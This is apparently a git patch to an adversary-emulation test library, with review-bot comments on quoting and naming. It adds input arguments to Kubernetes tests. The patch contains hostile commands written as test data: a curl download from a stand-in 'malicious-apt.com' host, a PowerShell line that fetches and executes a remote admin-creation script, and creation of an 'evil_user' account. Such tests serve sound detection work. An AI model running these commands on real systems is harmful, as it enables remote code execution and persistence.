From 0352cebfd78e2d2ab14128e849f64b7e9e053722 Mon Sep 17 00:00:00 2001 From: Hare Sudhan Date: Sat, 4 Oct 2025 13:50:35 -0400 Subject: [PATCH] adding input args --- atomics/T1105/T1105.yaml | 10 +++++- atomics/T1136.001/T1136.001.yaml | 57 +++++++++++++++++--------------- atomics/T1552.007/T1552.007.yaml | 2 +- 3 files changed, 40 insertions(+), 29 deletions(-) diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index d69c325f..a5cbd924 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -1280,6 +1280,14 @@ atomic_tests: description: K8s pod_name to execute the command in type: string default: atomic-insecure-curl + remote_url: + description: Remote URL to curl + type: string + default: https://malicious-apt.com + image_name: + description: Name of the docker image + type: string + default: curlimages/curl dependencies: - description: kubectl must be installed and configured get_prereq_command: | @@ -1290,4 +1298,4 @@ atomic_tests: name: bash elevation_required: false command: | - kubectl run #{pod_name} --image=curlimages/curl --restart=Never --rm -it -- curl -ksL https://malicious-apt.com \ No newline at end of file + kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- curl -ksL #{remote_url} \ No newline at end of file diff --git a/atomics/T1136.001/T1136.001.yaml b/atomics/T1136.001/T1136.001.yaml index ea5585f3..0bf06961 100644 --- a/atomics/T1136.001/T1136.001.yaml +++ b/atomics/T1136.001/T1136.001.yaml 
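Review bot: In atomics/T1105/T1105.yaml the new `#{image_name}` and `#{remote_url}` values are substituted into the bash command unquoted, so a value containing spaces or shell metacharacters (a URL with `&` in its query string, for example) is split or interpreted by the shell instead of reaching kubectl and curl as a single argument. Quote both substitutions: `kubectl run #{pod_name} --image="#{image_name}" --restart=Never --rm -it -- curl -ksL "#{remote_url}"`. The same applies to `--image=#{alpine}` in the T1136.001 hunk. The `image_name` default also carries no tag or digest, so each run pulls whatever the registry currently serves; its description could say `Container image to run (pin a tag or digest you have vetted)`. Since the command runs curl with `-k` and `-L`, the `remote_url` description should also state that the default host is outside the tester's control and is meant to be replaced with an endpoint the operator owns.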
@@ -185,30 +185,33 @@ atomic_tests: command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/0xv1n/dotnetfun/9b3b0d11d1c156909c0b1823cff3004f80b89b1f/Persistence/CreateNewLocalAdmin_ART.ps1') name: powershell elevation_required: true -- name: Create a Linux user via kubectl in a Pod - description: | - Launches a short-lived Alpine pod and creates a Linux user inside the pod. - The pod is automatically deleted after execution. - supported_platforms: - - containers - input_arguments: - pod_name: - description: K8s pod_name to execute the command in - type: string - default: atomic-linux-useradd - username: - description: Username of the user to create inside the pod - type: string - default: evil_user - dependencies: - - description: kubectl must be installed and configured - get_prereq_command: | - echo "kubectl must be installed manually" - prereq_command: | - which kubectl - executor: - name: bash - elevation_required: false - command: | - kubectl run #{pod_name} --image=alpine --restart=Never --rm -it -- sh -lc 'adduser -D #{username} && id #{username}' - +- name: Create a Linux user via kubectl in a Pod + description: | + Launches a short-lived Alpine pod and creates a Linux user inside the pod. + The pod is automatically deleted after execution. 
+ supported_platforms: + - containers + input_arguments: + pod_name: + description: K8s pod_name to execute the command in + type: string + default: atomic-linux-useradd + username: + description: Username of the user to create inside the pod + type: string + default: evil_user + alpine: + description: Name of the docker image + type: string + default: alpine + dependencies: + - description: kubectl must be installed and configured + get_prereq_command: | + echo "kubectl must be installed manually" + prereq_command: | + which kubectl + executor: + name: bash + elevation_required: false + command: | + kubectl run #{pod_name} --image=#{alpine} --restart=Never --rm -it -- sh -lc 'adduser -D #{username} && id #{username}' diff --git a/atomics/T1552.007/T1552.007.yaml b/atomics/T1552.007/T1552.007.yaml index 762b6638..e59b9eb7 100644 --- a/atomics/T1552.007/T1552.007.yaml +++ b/atomics/T1552.007/T1552.007.yaml @@ -1,6 +1,6 @@ attack_technique: T1552.007 display_name: Kubernetes List Secrets -atomic_tests: +atomic_tests: - name: List All Secrets auto_generated_guid: 31e794c4-48fd-4a76-aca4-6587c155bc11 description: |
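Review bot: The image argument added in atomics/T1136.001/T1136.001.yaml is named `alpine`, after its default value rather than its role, while the equivalent argument in T1105.yaml in this same patch is called `image_name`. Anyone overriding it ends up with `alpine` holding a non-Alpine image, and the two tests need different argument names for the same setting. Rename it to `image_name` and reference it as `--image="#{image_name}"`. The test description still says it launches an Alpine pod, which only holds for the default; `Launches a short-lived pod (Alpine by default)` would stay accurate. `adduser -D` appears to rely on the BusyBox flavour of adduser, so the argument description could note that a replacement image must provide it.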